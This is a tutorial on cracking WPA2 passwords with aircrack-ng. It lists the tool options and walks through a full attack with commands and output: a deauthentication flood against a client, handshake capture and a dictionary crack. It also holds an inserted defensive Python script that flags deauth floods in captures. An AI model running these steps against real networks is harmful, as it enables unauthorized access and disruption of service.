Cracking WPA 2 with AIRCRACK SUITE

AIRCRACK – NG

Aircrack-ng is an 802.11 WEP and WPA-PSK key cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with optimizations such as the KoreK attacks, as well as the PTW attack, which makes WEP key recovery much faster than with other WEP cracking tools.

Usage

Syntax

aircrack-ng [options] [<input file> [<output file>]]

Options

  Common options:

      -a <amode> : force attack mode (1/WEP, 2/WPA-PSK)
      -e <essid> : target selection: network identifier
      -b <bssid> : target selection: access point's MAC
      -p <nbcpu> : # of CPU to use  (default: all CPUs)
      -q         : enable quiet mode (no status output)
      -C <macs>  : merge the given APs to a virtual one
      -l <file>  : write key to file

  Static WEP cracking options:

      -c         : search alpha-numeric characters only
      -t         : search binary coded decimal chr only
      -h         : search the numeric key for Fritz!BOX
      -d <mask>  : use masking of the key (A1:XX:CF:YY)
      -m <maddr> : MAC address to filter usable packets
      -n <nbits> : WEP key length :  64/128/152/256/512
      -i <index> : WEP key index (1 to 4), default: any
      -f <fudge> : bruteforce fudge factor,  default: 2
      -k <korek> : disable one attack method  (1 to 17)
      -x or -x0  : disable bruteforce for last keybytes
      -x1        : last keybyte bruteforcing  (default)
      -x2        : enable last  2 keybytes bruteforcing
      -X         : disable  bruteforce   multithreading
      -y         : experimental  single bruteforce mode
      -K         : use only old KoreK attacks (pre-PTW)
      -s         : show the key in ASCII while cracking
      -M <num>   : specify maximum number of IVs to use
      -D         : WEP decloak, skips broken keystreams
      -P <num>   : PTW debug:  1: disable Klein, 2: PTW
      -1         : run only 1 try to crack key with PTW

  WEP and WPA-PSK cracking options:

      -w <words> : path to wordlist(s) filename(s)
      -r <DB>    : path to airolib-ng database
                   (Cannot be used with -w)

      --help     : Displays this usage screen



AIRMON – NG

This script can be used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode. Entering the airmon-ng command without parameters will show the interfaces status.

Usage

Syntax

airmon-ng <start|stop|check> <interface> [channel or frequency]

Options

<start|stop> indicates whether to start or stop monitor mode on the interface. (Mandatory)

<interface> specifies the interface. (Mandatory)

[channel] optionally sets the card to a specific channel.

<check|check kill>: "check" shows any processes that might interfere with the aircrack-ng suite. It is strongly recommended that these processes be terminated before using the aircrack-ng suite. "check kill" checks for and kills the processes that might interfere with the aircrack-ng suite.


AIREPLAY – NG

Its primary function is to generate traffic for later use in aircrack-ng when cracking WEP and WPA-PSK keys. It provides several attacks: deauthentication (to provoke a WPA handshake that can be captured), fake authentication, interactive packet replay, hand-crafted ARP request injection and ARP-request reinjection.

Usage

Syntax

aireplay-ng <options> <replay interface>

Options

Filter options:

      -b bssid  : MAC address, Access Point
      -d dmac   : MAC address, Destination
      -s smac   : MAC address, Source
      -m len    : minimum packet length
      -n len    : maximum packet length
      -u type   : frame control, type    field
      -v subt   : frame control, subtype field
      -t tods   : frame control, To      DS bit
      -f fromds : frame control, From    DS bit
      -w iswep  : frame control, WEP     bit
      -D        : disable AP detection

  Replay options:

      -x nbpps  : number of packets per second
      -p fctrl  : set frame control word (hex)
      -a bssid  : set Access Point MAC address
      -c dmac   : set Destination  MAC address
      -h smac   : set Source       MAC address
      -g value  : change ring buffer size (default: 8)
      -F        : choose first matching packet

      Fakeauth attack options:

      -e essid  : set target AP SSID
      -o npckts : number of packets per burst (0=auto, default: 1)
      -q sec    : seconds between keep-alives
      -y prga   : keystream for shared key auth
      -T n      : exit after retry fake auth request n time

      Arp Replay attack options:

      -j        : inject FromDS packets

      Fragmentation attack options:

      -k IP     : set destination IP in fragments
      -l IP     : set source IP in fragments

      Test attack options:

      -B        : activates the bitrate test

  Source options:

      -i iface  : capture packets from this interface
      -r file   : extract packets from this pcap file

  Miscellaneous options:

      -R                    : disable /dev/rtc usage
      --ignore-negative-one : if the interface's channel can't be determined,
                              ignore the mismatch, needed for unpatched cfg80211

  Attack modes (numbers can still be used):

      --deauth      count : deauthenticate 1 or all stations (-0)
      --fakeauth    delay : fake authentication with AP (-1)
      --interactive       : interactive frame selection (-2)
      --arpreplay         : standard ARP-request replay (-3)
      --chopchop          : decrypt/chopchop WEP packet (-4)
      --fragment          : generates valid keystream   (-5)
      --caffe-latte       : query a client for new IVs  (-6)
      --cfrag             : fragments against a client  (-7)
      --test              : tests injection and quality (-9)

      --help              : Displays this usage screen



AIRODUMP – NG

Airodump-ng is used for capturing raw 802.11 frames and is particularly suitable for collecting WEP IVs (Initialization Vectors) with the intent of using them with aircrack-ng. If you have a GPS receiver connected to the computer, airodump-ng can also log the coordinates of the access points it finds.

Usage

Syntax

airodump-ng <options> <interface>[,<interface>,...]

Options

      --ivs                 : Save only captured IVs
      --gpsd                : Use GPSd
      --write      <prefix> : Dump file prefix
      -w                    : same as --write 
      --beacons             : Record all beacons in dump file
      --update       <secs> : Display update delay in seconds
      --showack             : Prints ack/cts/rts statistics
      -h                    : Hides known stations for --showack
      -f            <msecs> : Time in ms between hopping channels
      --berlin       <secs> : Time before removing the AP/client
                              from the screen when no more packets
                              are received (Default: 120 seconds)
      -r             <file> : Read packets from that file
      -x            <msecs> : Active Scanning Simulation
      --output-format
                  <formats> : Output format. Possible values:
                              pcap, ivs, csv, gps, kismet, netxml
      --ignore-negative-one : Removes the message that says
                              fixed channel <interface>: -1

  Filter options:
      --encrypt   <suite>   : Filter APs by cipher suite
      --netmask <netmask>   : Filter APs by mask
      --bssid     <bssid>   : Filter APs by BSSID
      -a                    : Filter unassociated clients

  By default, airodump-ng hop on 2.4GHz channels.
  You can make it capture on other/specific channel(s) by using:
      --channel <channels>  : Capture on specific channels
      --band <abg>          : Band on which airodump-ng should hop
      -C    <frequencies>   : Uses these frequencies in MHz to hop
      --cswitch  <method>   : Set channel switching method
                    0       : FIFO (default)
                    1       : Round Robin
                    2       : Hop on last
      -s                    : same as --cswitch

      --help                : Displays this usage screen


Example

Cracking WPA2:

First, check your WLAN interface:

cyborg@cyborg:~$ sudo airmon-ng 


Interface	Chipset		Driver

wlan0		RTL8187 	rtl8187 - [phy0]

Enable monitor mode on your wireless interface (optionally on your preferred channel):

cyborg@cyborg:~$ sudo airmon-ng start  wlan0 1


Found 6 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID	Name
920	avahi-daemon
924	avahi-daemon
1031	NetworkManager
1246	dhclient
1294	wpa_supplicant
1671	dhclient
Process with PID 1671 (dhclient) is running on interface wlan0


Interface	Chipset		Driver

wlan0		RTL8187 	rtl8187 - [phy0]
				(monitor mode enabled on mon0

Find the BSSID of the target wireless network:

cyborg@cyborg:~$ sudo airodump-ng -c 1  -w capture mon0
[sudo] password for cyborg: 


 CH  1 ][ Elapsed: 0 s ][ 2012-06-03 17:50 ]         
                                                                               
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH E
                                                                               
 10:FE:ED:B7:A5:42  -34   0       11        2    0   1  54e  WPA2 CCMP   PSK  t
                                                                               
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes 

Here, 10:FE:ED:B7:A5:42 is the target BSSID.

Start packet capturing with airodump-ng, filtered to the target BSSID:

cyborg@cyborg:~$ sudo airodump-ng -c 1  -w packetscap --bssid  10:FE:ED:B7:A5:42 wlan0


 CH  1 ][ Elapsed: 2 mins ][ 2012-06-03 17:44 [ WPA handshake: 10:FE:ED:B7:A5:42                                  
                                                                               
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH E
                                                                               
 10:FE:ED:B7:A5:42  -30   0     1393      382    2   1  54e  WPA2 CCMP   PSK  t
                                                                               
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes     
                                                                               
 10:FE:ED:B7:A5:42  C8:F7:33:77:1A:BE    0    0 - 1     60    32659             
 10:FE:ED:B7:A5:42  94:EB:CD:4A:48:5C  -18    0 - 2      0      123             
 10:FE:ED:B7:A5:42  D8:3C:69:76:09:96  -24    0 - 1      2       15             
 10:FE:ED:B7:A5:42  74:DE:2B:C3:A0:2F  -25    1e- 1      0       55             
 10:FE:ED:B7:A5:42  FA:76:18:D1:D8:28  -25   36 - 1      0      172             

Deauthenticate a connected client with aireplay-ng so that it reconnects and the handshake is captured sooner:

cyborg@cyborg:~$ sudo aireplay-ng -0 1000 -a  10:FE:ED:B7:A5:42 -c C8:F7:33:77:1A:BE wlan0
17:42:38  Waiting for beacon frame (BSSID: 10:FE:ED:B7:A5:42) on channel 1
17:42:39  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [51|67 ACKs]
17:42:40  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 0|64 ACKs]
17:42:40  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 0|64 ACKs]
17:42:41  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 0|64 ACKs]
17:42:41  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 0|64 ACKs]
17:42:42  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 0|64 ACKs]
17:42:42  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 6|64 ACKs]
17:42:43  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 0|64 ACKs]
17:42:43  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 0|64 ACKs]
17:42:44  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 0|64 ACKs]
17:42:44  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 0|64 ACKs]
17:42:45  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 0|64 ACKs]
17:42:45  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 0|64 ACKs]

Crack the WPA key with the captured 4-way handshake:

cyborg@cyborg:~$ aircrack-ng -w dict.txt -b 10:FE:ED:B7:A5:42 packetscap.cap
Opening packetscap.cap
Opening packetscap1.cap
Reading packets, please wait...


                                 Aircrack-ng 1.1


                   [00:00:00] 94 keys tested (296.78 k/s)


                          KEY FOUND! [ trendztrela ]


      Master Key     : 20 B5 5F 4B 85 49 89 18 05 B5 E1 A2 3D 1D E1 3A 
                       93 B4 4E 92 08 57 A1 DC DD 2E 31 F9 F3 73 C8 41 

      Transient Key  : AD B3 0A 8F C7 4B 18 2D 35 30 6A 1B 6C 36 87 10 
                       8E 5B 16 7F 74 25 F3 AC 81 36 3C 71 7F 66 67 41 
                       54 E1 74 F2 23 31 87 90 59 1E EA C9 D4 6E 66 1B 
                       66 66 3A C2 3C 81 49 CC 4B 31 4C BF 6E 91 C7 76 

      EAPOL HMAC     : 35 35 91 F8 43 47 11 21 2D 63 15 0E 02 A2 A1 47



Troubleshooting:

Device or resource busy:

Sometimes airodump-ng reports "device or resource busy". This can happen because the interface is in managed mode rather than monitor mode:

cyborg@cyborg:~$ iwconfig wlan0
wlan0     IEEE 802.11bg  ESSID:"tempztrela"  
          Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated
          Bit Rate=1 Mb/s   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality=70/70  Signal level=-36 dBm  
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:1  Invalid misc:0   Missed beacon:0

To solve this, run the following commands:

cyborg@cyborg:~$ sudo ifconfig wlan0 down
cyborg@cyborg:~$ sudo iwconfig wlan0 mode monitor
cyborg@cyborg:~$ sudo ifconfig wlan0 up
cyborg@cyborg:~$ iwconfig wlan0
wlan0     IEEE 802.11bg  Mode:Monitor  Frequency:2.412 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

Handshake captured but not showing:

There are two ways to see whether you captured any handshake packets. First, watch the airodump-ng screen for "WPA handshake: 10:FE:ED:B7:A5:42" in the top right-hand corner; this means a four-way handshake was successfully captured. See the airodump-ng output above for an example.

Second, open the capture in Wireshark and apply the display filter "eapol". This shows only the EAPOL packets you are interested in, so you can see whether the capture contains 0, 1, 2, 3 or 4 EAPOL packets.
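The deauthentication burst from the aireplay-ng step above and the EAPOL messages checked here are both visible to anyone capturing the same channel, so a defender can triage a capture offline without Wireshark. The following Python script is an added example, not code from this page or from the aircrack-ng project: it parses a classic pcap of raw 802.11 frames (link type 105, no radiotap header), records which EAPOL-Key messages of the 4-way handshake were seen for each client (the same frames the Wireshark "eapol" filter shows), and flags a station that receives a burst of deauthentication frames. The sample capture, the placeholder MAC addresses, the flood threshold of 10 frames and the simplified key-info rule used to number the handshake messages are all assumptions made for the example.

```python
"""Added example (not aircrack-ng code): offline triage of an 802.11 capture, counting
EAPOL 4-way handshake messages per client and flagging deauthentication floods.
Reads a classic little-endian pcap, link type 105 (raw 802.11, no radiotap header)."""
import struct
from collections import Counter, defaultdict

LINKTYPE_IEEE802_11 = 105
LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"  # LLC/SNAP, EtherType 0x888E (EAPOL)
AP = "02:00:00:aa:bb:01"    # constructed placeholder BSSID, not a real device
STA = "02:00:00:cc:dd:02"   # constructed placeholder client that completes a handshake
STA2 = "02:00:00:cc:dd:04"  # constructed placeholder client whose handshake stays incomplete

def mac(s):
    return bytes.fromhex(s.replace(":", ""))

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def deauth_frame(bssid, sta, reason=7):
    """Management frame (type 0), subtype 12 = deauthentication, sent AP -> station."""
    hdr = struct.pack("<BBH", 0xC0, 0x00, 0) + mac(sta) + mac(bssid) + mac(bssid) + b"\x00\x00"
    return hdr + struct.pack("<H", reason)

def eapol_key_frame(src, dst, bssid, key_info, from_ap):
    """Plain data frame (type 2, subtype 0) carrying one EAPOL-Key message.
    FromDS (AP -> STA): addr1=DA, addr2=BSSID, addr3=SA.  ToDS: addr1=BSSID, addr2=SA, addr3=DA."""
    fc1 = 0x02 if from_ap else 0x01
    addrs = mac(dst) + mac(bssid) + mac(src) if from_ap else mac(bssid) + mac(src) + mac(dst)
    hdr = struct.pack("<BBH", 0x08, fc1, 0) + addrs + b"\x00\x00"
    # EAPOL-Key body (95 bytes): descriptor type 2 (RSN), key info, key length 16, then the
    # replay counter/nonce/IV/RSC/ID/MIC fields (88 bytes, zeroed here) and key-data length 0.
    key_body = struct.pack(">BHH", 2, key_info, 16) + bytes(88) + struct.pack(">H", 0)
    eapol = struct.pack(">BBH", 2, 3, len(key_body)) + key_body  # EAPOL version 2, type 3 = Key
    return hdr + LLC_SNAP_EAPOL + eapol

def make_pcap(frames, start_ts=1338745200):
    """Classic pcap: 24-byte global header, then a 16-byte record header before each frame."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", start_ts + i, 0, len(f), len(f)) + f
    return out

def parse_pcap(data):
    magic, _, _, _, _, _, link = struct.unpack("<IHHiIII", data[:24])
    if magic != 0xA1B2C3D4 or link != LINKTYPE_IEEE802_11:
        raise ValueError("expected a little-endian pcap with link type 105")
    off = 24
    while off + 16 <= len(data):
        incl = struct.unpack("<IIII", data[off:off + 16])[2]
        yield data[off + 16:off + 16 + incl]
        off += 16 + incl

def classify_eapol(key_info):
    """Simplified key-info rule: M1 = ACK only; M2 = MIC without ACK or Secure;
    M3 = ACK + MIC; M4 = MIC + Secure without ACK.  Returns None for anything else."""
    ack, mic, secure = key_info & 0x0080, key_info & 0x0100, key_info & 0x0200
    if ack and not mic:
        return 1
    if mic and not ack:
        return 4 if secure else 2
    return 3 if ack and mic else None

def analyze(data, deauth_threshold=10):
    handshakes = defaultdict(set)  # (bssid, station) -> handshake message numbers seen
    deauths = Counter()            # (sender, receiver) -> number of deauth frames
    for frame in parse_pcap(data):
        if len(frame) < 24:
            continue
        fc0, fc1, a1, a2 = frame[0], frame[1], frame[4:10], frame[10:16]
        ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
        if ftype == 0 and subtype == 12:
            deauths[(mac_str(a2), mac_str(a1))] += 1
        elif ftype == 2 and subtype in (0, 8):
            body = frame[26 if subtype == 8 else 24:]  # QoS data adds a 2-byte QoS control field
            eapol = body[len(LLC_SNAP_EAPOL):] if body.startswith(LLC_SNAP_EAPOL) else b""
            if len(eapol) < 7 or eapol[1] != 3:  # EAPOL type 3 = EAPOL-Key
                continue
            msg = classify_eapol(struct.unpack(">H", eapol[5:7])[0])
            if msg is not None:
                bssid, sta = (a2, a1) if fc1 & 0x02 else (a1, a2)  # FromDS bit picks the layout
                handshakes[(mac_str(bssid), mac_str(sta))].add(msg)
    full = {1, 2, 3, 4}
    return {
        "complete_handshakes": sorted(k for k, v in handshakes.items() if full <= v),
        "partial_handshakes": {k: sorted(v) for k, v in handshakes.items() if not full <= v},
        "deauth_counts": dict(deauths),
        "deauth_floods": sorted(k for k, n in deauths.items() if n >= deauth_threshold),
    }

def sample_capture():
    """Constructed capture: a full handshake for STA, one 64-frame deauth burst at STA, a lone M1 for STA2."""
    frames = [eapol_key_frame(AP, STA, AP, 0x008A, True),   # M1
              eapol_key_frame(STA, AP, AP, 0x010A, False),  # M2
              eapol_key_frame(AP, STA, AP, 0x13CA, True),   # M3
              eapol_key_frame(STA, AP, AP, 0x030A, False)]  # M4
    frames += [deauth_frame(AP, STA) for _ in range(64)]
    frames.append(eapol_key_frame(AP, STA2, AP, 0x008A, True))
    return make_pcap(frames)
```

Running `analyze(sample_capture())` reports one complete handshake for STA, a partial handshake (only message 1) for STA2, and a deauthentication flood of 64 frames from the AP's address towards STA. On a real capture written by airodump-ng, pass the file contents to `analyze` after checking that airodump-ng wrote it with link type 105; captures with a radiotap header (link type 127) would first need the radiotap header stripped, which this example does not do.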

Negative fixed channel:

Add --ignore-negative-one to the airodump-ng and aireplay-ng commands if you are using mon0.

©2017 Ztrela Knowledge Solutions Pvt. Ltd
